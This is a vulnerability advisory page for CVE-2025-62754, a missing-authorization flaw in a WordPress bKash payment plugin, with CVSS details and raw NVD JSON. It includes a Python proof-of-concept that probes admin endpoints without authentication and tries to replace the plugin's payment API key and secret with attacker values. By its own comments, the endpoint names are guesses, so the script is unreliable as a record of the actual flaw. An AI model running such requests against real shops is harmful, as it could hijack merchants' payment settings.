Security Vulnerability Report
CVE-2025-62754 CVSS 5.3 MEDIUM

CVE-2025-62754

Published: 2026-01-22 17:15:59
Last Modified: 2026-04-27 17:16:33

Description

Missing Authorization vulnerability in Kapil Paul Payment Gateway bKash for WC woo-payment-bkash allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Payment Gateway bKash for WC: from n/a through <= 3.1.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

woo-payment-bkash <= 3.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

# CVE-2025-62754 PoC - Missing Authorization in woo-payment-bkash
# This PoC demonstrates accessing admin functions without authentication
import requests
import json

TARGET_URL = "http://target-wordpress-site.com"
PLUGIN_PATH = "/wp-content/plugins/woo-payment-bkash/"


# Try to access admin AJAX endpoints without authentication
def test_unauthorized_access():
    """
    Test various endpoints that should require authentication
    """
    # Common bKash plugin AJAX actions that might be vulnerable.
    # NOTE: these action names are guesses made by the PoC; the advisory
    # text above does not name the affected endpoint.
    vulnerable_endpoints = [
        f"{TARGET_URL}/wp-admin/admin-ajax.php?action=bkash_payment_settings",
        f"{TARGET_URL}/wp-admin/admin-ajax.php?action=bkash_get_transactions",
        f"{TARGET_URL}/wp-admin/admin-ajax.php?action=bkash_refund",
        f"{TARGET_URL}/wp-json/woo-payment-bkash/v1/settings",
    ]
    results = []
    for endpoint in vulnerable_endpoints:
        try:
            # Send request without authentication cookies
            response = requests.get(endpoint, timeout=10)
            result = {
                "endpoint": endpoint,
                "status_code": response.status_code,
                "response_length": len(response.text),
                "vulnerable": False,
            }
            # Check if response indicates successful unauthorized access
            if response.status_code == 200 and len(response.text) > 0:
                # Check for sensitive data exposure (keyword heuristic only;
                # a 200 with these words is not proof of a leak)
                keywords = ['settings', 'config', 'api', 'token', 'secret', 'bkash']
                if any(keyword in response.text.lower() for keyword in keywords):
                    result["vulnerable"] = True
                    result["sensitive_data_found"] = True
            results.append(result)
        except requests.RequestException as e:
            results.append({
                "endpoint": endpoint,
                "error": str(e),
            })
    return results


# Test POST requests for unauthorized actions
def test_unauthorized_post():
    """
    Test POST requests that should require authentication
    """
    post_endpoints = [
        f"{TARGET_URL}/wp-admin/admin-ajax.php",
        f"{TARGET_URL}/wp-json/woo-payment-bkash/v1/settings/update",
    ]
    results = []
    for endpoint in post_endpoints:
        try:
            # Craft POST request without authentication
            payload = {
                "action": "bkash_save_settings",
                "bkash_api_key": "attacker_controlled_key",
                "bkash_api_secret": "attacker_controlled_secret",
            }
            response = requests.post(endpoint, data=payload, timeout=10)
            result = {
                "endpoint": endpoint,
                "status_code": response.status_code,
                "response": response.text[:500],
                "settings_modified": False,
            }
            # Check if settings were modified (heuristic: success text in body)
            if response.status_code == 200:
                body = response.text.lower()
                if 'success' in body or 'updated' in body:
                    result["settings_modified"] = True
            results.append(result)
        except requests.RequestException as e:
            results.append({
                "endpoint": endpoint,
                "error": str(e),
            })
    return results


if __name__ == "__main__":
    print("CVE-2025-62754 PoC - Testing Missing Authorization in woo-payment-bkash")
    print("=" * 70)

    print("\n[1] Testing GET endpoints for unauthorized access...")
    get_results = test_unauthorized_access()
    for result in get_results:
        print(f"\nEndpoint: {result.get('endpoint')}")
        print(f"Status: {result.get('status_code')}")
        print(f"Vulnerable: {result.get('vulnerable', False)}")

    print("\n[2] Testing POST endpoints for unauthorized modifications...")
    post_results = test_unauthorized_post()
    for result in post_results:
        print(f"\nEndpoint: {result.get('endpoint')}")
        print(f"Status: {result.get('status_code')}")
        print(f"Settings Modified: {result.get('settings_modified', False)}")

    print("\n" + "=" * 70)
    print("PoC completed. Review results above.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62754", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:59.277", "lastModified": "2026-04-27T17:16:32.983", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Kapil Paul Payment Gateway bKash for WC woo-payment-bkash allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Payment Gateway bKash for WC: from n/a through <= 3.1.0."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Kapil Paul Payment Gateway bKash para WC woo-payment-bkash permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Payment Gateway bKash para WC: desde n/a hasta &lt;= 3.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-payment-bkash/vulnerability/wordpress-payment-gateway-bkash-for-wc-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}